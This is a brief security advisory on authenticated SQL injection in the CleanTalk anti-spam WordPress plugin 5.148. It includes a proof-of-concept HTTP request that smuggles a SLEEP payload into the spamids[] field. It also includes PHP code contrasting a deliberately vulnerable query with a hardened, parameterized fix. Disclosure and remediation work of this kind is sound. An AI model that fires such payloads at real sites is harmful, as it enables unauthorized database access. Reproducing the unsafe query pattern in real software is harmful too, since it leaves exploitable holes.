Multiple authenticated SQL injections exist in the Anti-Spam by CleanTalk plugin 5.148; however, exploiting them requires a high-privilege user (admin+).
Vulnerable functions: removeLogs and removeSpam at lib/Cleantalk/ApbctWP/FindSpam/ListTable/Users.php

Sleep query:

POST /wp-admin/users.php?page=ct_check_users&ct_worked=1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 162

_wpnonce=2a613d258a&_wp_http_referer=%2Fwp-admin%2Fusers.php%3Fpage%3Dct_check_users%26ct_worked%3D1&action=-1&paged=1&spamids%5B%5D=30)+OR+SLEEP(1&action2=delete
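As an added illustration (not the plugin's own code), the following shows the pattern behind this class of bug and the fix a maintainer would apply: a spamids[] list joined straight into the query, beside a version that validates every id as a positive integer and binds it through $wpdb->prepare placeholders, so a value like `30) OR SLEEP(1` is rejected before any SQL is built. Function names and the target table are assumptions.

```php
<?php
// Added example, not CleanTalk plugin code. Assumes a WordPress context
// where $wpdb is available; the table ($wpdb->users) is an assumption.

/**
 * Unsafe pattern: the raw spamids[] values are concatenated into SQL, so a
 * value such as "30) OR SLEEP(1" changes the structure of the WHERE clause.
 */
function example_remove_spam_unsafe( array $ids ) {
    global $wpdb;
    $list = implode( ',', $ids );
    // Resulting SQL: DELETE ... WHERE ID IN (30) OR SLEEP(1)
    return $wpdb->query( "DELETE FROM {$wpdb->users} WHERE ID IN ({$list})" );
}

/**
 * Hardened pattern: every id must be a plain positive decimal integer, and
 * each one is bound via its own %d placeholder. Returns false on bad input.
 */
function example_remove_spam_safe( array $ids ) {
    global $wpdb;

    $clean = array();
    foreach ( $ids as $id ) {
        // Reject anything that is not a digit-only string (no spaces,
        // parentheses or SQL keywords can survive this check).
        if ( ! is_scalar( $id ) || ! ctype_digit( (string) $id ) || (int) $id <= 0 ) {
            return false;
        }
        $clean[] = (int) $id;
    }
    if ( empty( $clean ) ) {
        return false;
    }

    // Build "%d,%d,%d" with one placeholder per id, then bind the values.
    $placeholders = implode( ',', array_fill( 0, count( $clean ), '%d' ) );
    $sql = $wpdb->prepare(
        "DELETE FROM {$wpdb->users} WHERE ID IN ({$placeholders})",
        $clean
    );
    return $wpdb->query( $sql );
}

// With the request body above, $_POST['spamids'] = array( '30) OR SLEEP(1' ):
// example_remove_spam_safe( (array) $_POST['spamids'] ) returns false and
// runs no query. The caller should also verify the nonce and
// current_user_can( 'manage_options' ) before reaching either function.
```

Because the ids are bound as integers, a request of this shape now fails validation instead of producing a measurable delay, which is also the behaviour to confirm when re-testing a patched install.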